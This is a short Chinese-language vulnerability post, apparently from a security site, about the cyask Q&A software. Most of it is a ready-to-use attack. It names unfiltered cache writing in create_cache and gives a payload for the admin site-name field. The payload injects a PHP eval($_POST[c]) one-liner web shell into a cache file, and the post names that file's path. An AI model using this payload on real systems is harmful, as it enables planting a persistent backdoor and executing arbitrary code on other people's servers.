【漏洞】cyask 后台拿 WebShell

  • A+
所属分类:lcx

涉及系统:
cyask所有版本

漏洞描述:
cache的时候没有进行过滤

漏洞位置:
include/global.func.php中的create_cache函数

利用方法:
后台参数设置,在网站名称里输入:';?> eval($_POST[c]);?>

生成的一句话位于:askdata/cache/cache_variable.php文章来源于lcx.cc:【漏洞】cyask 后台拿 WebShell

相关推荐: iCloud云备风险

iCloud是Apple提供给用户的云同步工具,主要用于丢失设备或购买新设备时,可以轻松地恢复先前设备上拥有的相同信息。但当用户的Apple ID失窃之后,则可能面临用户数据被盗取的风险。 iCloud备份 --- iCloud的相关信息,Apple在Supp…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: